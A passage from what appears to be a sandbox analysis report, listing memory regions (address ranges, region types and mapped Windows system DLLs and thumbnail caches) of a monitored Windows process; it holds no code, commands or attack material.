"c:\\windows\\system32\\cfgmgr32.dll") Region: id = 861 start_va = 0x7fefd9f0000 end_va = 0x7fefda2afff monitored = 0 entry_point = 0x7fefd9f1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 862 start_va = 0x7fefda30000 end_va = 0x7fefdb9cfff monitored = 0 entry_point = 0x7fefda310b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 863 start_va = 0x7fefdba0000 end_va = 0x7fefdd17fff monitored = 0 entry_point = 0x7fefdba10e0 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 864 start_va = 0x7fefdd20000 end_va = 0x7fefde49fff monitored = 0 entry_point = 0x7fefdd210d4 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 865 start_va = 0x7fefde50000 end_va = 0x7fefdee8fff monitored = 0 entry_point = 0x7fefde51c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 866 start_va = 0x7fefdef0000 end_va = 0x7fefdf0efff monitored = 0 entry_point = 0x7fefdef60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 867 start_va = 0x7fefdf10000 end_va = 0x7fefe112fff monitored = 0 entry_point = 0x7fefdf33330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 868 start_va = 0x7fefe120000 end_va = 0x7fefe1e8fff monitored = 0 entry_point = 0x7fefe19a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 869 start_va = 0x7fefe1f0000 end_va = 0x7fefef77fff monitored = 0 entry_point = 0x7fefe26cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 870 start_va = 0x7fefef80000 end_va = 0x7fefef8dfff monitored = 0 entry_point = 0x7fefef81080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 871 start_va = 0x7fefef90000 end_va = 0x7feff166fff monitored = 0 entry_point = 0x7fefef91010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 872 start_va = 0x7feff170000 end_va = 0x7feff3c8fff monitored = 0 entry_point = 0x7feff171340 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 873 start_va = 0x7feff3d0000 end_va = 0x7feff4d8fff monitored = 0 entry_point = 0x7feff3d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 874 start_va = 0x7feff4e0000 end_va = 0x7feff531fff monitored = 0 entry_point = 0x7feff4e10d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 875 start_va = 0x7feff540000 end_va = 0x7feff547fff monitored = 0 entry_point = 0x7feff541504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 876 start_va = 0x7feff550000 end_va = 0x7feff626fff monitored = 0 entry_point = 0x7feff553274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 877 start_va = 0x7feff630000 end_va = 0x7feff6a0fff monitored = 0 entry_point = 0x7feff641e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 878 start_va = 0x7feff7d0000 end_va = 0x7feff86efff monitored = 0 entry_point = 0x7feff7d25a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 879 start_va = 0x7feff870000 end_va = 0x7feff94afff monitored = 0 entry_point = 0x7feff890760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 880 start_va = 0x7feff950000 end_va = 0x7feff97dfff monitored = 0 entry_point = 0x7feff951010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 881 start_va = 0x7feff980000 end_va = 0x7feff9e6fff monitored = 0 entry_point = 0x7feff98b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 882 start_va = 0x7feffa10000 end_va = 0x7feffa5cfff monitored = 0 entry_point = 0x7feffa11070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 883 start_va = 0x7feffa60000 end_va = 0x7feffb8cfff monitored = 0 entry_point = 0x7feffaaed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 884 start_va = 0x7feffba0000 end_va = 0x7feffba0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 885 start_va = 0x7fffff0a000 end_va = 0x7fffff0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff0a000" filename = "" Region: id = 886 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 887 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 888 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 889 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 890 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 891 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 892 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 893 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 894 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 895 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 896 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 897 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 898 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 899 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 900 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 901 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 902 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 903 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 904 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 905 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 906 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 907 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 908 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 909 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 910 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 911 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 912 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 913 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 914 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 915 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 916 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 917 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 918 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 919 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 920 start_va = 0x3550000 end_va = 0x3561fff monitored = 0 entry_point = 0x3551bd8 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 922 start_va = 0x3550000 end_va = 0x3561fff monitored = 0 entry_point = 0x3551bd8 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 923 start_va = 0x5fb0000 end_va = 0x602ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fb0000" filename = "" Region: id = 924 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 925 start_va = 0x3550000 end_va = 0x3561fff monitored = 0 entry_point = 0x3551bd8 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 926 start_va = 0x3550000 end_va = 0x3552fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003550000" filename = "" Region: id = 927 start_va = 0x3560000 end_va = 0x3560fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003560000" filename = "" Region: id = 928 start_va = 0x3570000 end_va = 0x3572fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003570000" filename = "" Region: id = 929 start_va = 0x3580000 end_va = 0x3582fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 930 start_va = 0x3590000 end_va = 0x3592fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 931 start_va = 0x35a0000 end_va = 0x35affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 932 start_va = 0x36b0000 end_va = 0x36b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036b0000" filename = "" Region: id = 933 start_va = 0x3c80000 end_va = 0x3c81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 934 start_va = 0x41c0000 end_va = 0x4215fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 935 start_va = 0x3fd0000 end_va = 0x3fd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 936 start_va = 0x3fe0000 end_va = 0x3fe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fe0000" filename = "" Region: id = 937 start_va = 0x3ff0000 end_va = 0x3ff0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ff0000" filename = "" Region: id = 938 start_va = 0x4000000 end_va = 0x4000fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 939 start_va = 0x4010000 end_va = 0x4010fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004010000" filename = "" Region: id = 940 start_va = 0x40a0000 end_va = 0x40a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 941 start_va = 0x4130000 end_va = 0x4130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 942 start_va = 0x42a0000 end_va = 0x42a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042a0000" filename = "" Region: id = 943 start_va = 0x42b0000 end_va = 0x42b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042b0000" filename = "" Region: id = 944 start_va = 0x42c0000 end_va = 0x42c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042c0000" filename = "" Region: id = 945 start_va = 0x5bc0000 end_va = 0x5bc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005bc0000" filename = "" Region: id = 946 start_va = 0x5bd0000 end_va = 0x5bd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005bd0000" filename = "" Region: id = 947 start_va = 0x5c60000 end_va = 0x5c60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c60000" filename = "" Region: id = 948 start_va = 0x5c70000 end_va = 0x5c70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c70000" filename = "" Region: id = 949 start_va = 0x5c80000 end_va = 0x5c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c80000" filename = "" Region: id = 952 start_va = 0x41c0000 end_va = 0x4215fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 953 start_va = 0x27e0000 end_va = 0x27e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 954 start_va = 0x41c0000 end_va = 0x41c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 955 start_va = 0x5c90000 end_va = 0x5ce5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 956 start_va = 0x5c90000 end_va = 0x5ce5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 957 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 958 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 959 start_va = 0x70b10000 end_va = 0x71e65fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 960 start_va = 0x41d0000 end_va = 0x41d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 961 start_va = 0x6f7b0000 end_va = 0x70b05fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 962 start_va = 0x41d0000 end_va = 0x41d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 963 start_va = 0x67a0000 end_va = 0x689ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 964 start_va = 0x68a0000 end_va = 0x699ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 965 start_va = 0x69a0000 end_va = 0x6a9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 966 start_va = 0x41d0000 end_va = 0x41d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 967 start_va = 0x4200000 end_va = 0x4200fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 968 start_va = 0x4210000 end_va = 0x4210fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 969 start_va = 0x5cb0000 end_va = 0x5cb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005cb0000" filename = "" Region: id = 970 start_va = 0x5c90000 end_va = 0x5c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c90000" filename = "" Region: id = 971 start_va = 0x5ca0000 end_va = 0x5ca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ca0000" filename = "" Region: id = 972 start_va = 0x5cd0000 end_va = 0x5cd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005cd0000" filename = "" Region: id = 973 start_va = 0x5ce0000 end_va = 0x5cf1fff monitored = 0 entry_point = 0x5ce1bd8 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 974 start_va = 0x5ce0000 end_va = 0x5cf1fff monitored = 0 entry_point = 0x5ce1bd8 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 975 start_va = 0x5ce0000 end_va = 0x5d35fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 976 start_va = 0x5ce0000 end_va = 0x5d35fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 977 start_va = 0x5ce0000 end_va = 0x5d35fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 978 start_va = 0x5ce0000 end_va = 0x5d35fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 979 start_va = 0x5ce0000 end_va = 0x5d35fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 980 start_va = 0x5ce0000 end_va = 0x5d35fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 981 start_va = 0x5ce0000 end_va = 0x5d35fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 982 start_va = 0x5ce0000 end_va = 0x5cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ce0000" filename = "" Region: id = 983 start_va = 0x6aa0000 end_va = 0x6c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006aa0000" filename = "" Region: id = 984 start_va = 0x5cc0000 end_va = 0x5ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005cc0000" filename = "" Region: id = 985 start_va = 0x5d00000 end_va = 0x5d00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d00000" filename = "" Region: id = 986 start_va = 0x5d10000 end_va = 0x5d17fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d10000" filename = "" Region: id = 987 start_va = 0x5d20000 end_va = 0x5d21fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d20000" filename = "" Region: id = 988 start_va = 0x5d30000 end_va = 0x5d41fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d30000" filename = "" Region: id = 989 start_va = 0x6ca0000 end_va = 0x6e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ca0000" filename = "" Region: id = 990 start_va = 0x70b10000 end_va = 0x71e65fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 991 start_va = 0x5dd0000 end_va = 0x5dd0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 992 start_va = 0x6f7b0000 end_va = 0x70b05fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 993 start_va = 0x5dd0000 end_va = 0x5dd0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 994 start_va = 0x70b10000 end_va = 0x71e65fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 995 start_va = 0x5dd0000 end_va = 0x5dd0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 996 start_va = 0x6ea0000 end_va = 0x769ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ea0000" filename = "" Region: id = 997 start_va = 0x7fef72c0000 end_va = 0x7fef733afff monitored = 0 entry_point = 0x7fef732bf74 region_type = mapped_file name = "structuredquery.dll" filename = "\\Windows\\System32\\StructuredQuery.dll" (normalized: "c:\\windows\\system32\\structuredquery.dll") Region: id = 999 start_va = 0x6f7b0000 end_va = 0x70b05fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1000 start_va = 0x5dd0000 end_va = 0x5dd0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1001 start_va = 0x70b10000 end_va = 0x71e65fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1002 start_va = 0x5dd0000 end_va = 0x5dd0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1003 start_va = 0x5dd0000 end_va = 0x5dd1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "networkexplorer.dll.mui" filename = "\\Windows\\System32\\en-US\\NetworkExplorer.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\networkexplorer.dll.mui") Region: id = 1004 start_va = 0x5de0000 end_va = 0x5de0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1005 start_va = 0x5df0000 end_va = 0x5df6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1006 start_va = 0x5de0000 end_va = 0x5de0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1007 start_va = 0x5df0000 end_va = 0x5df6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name 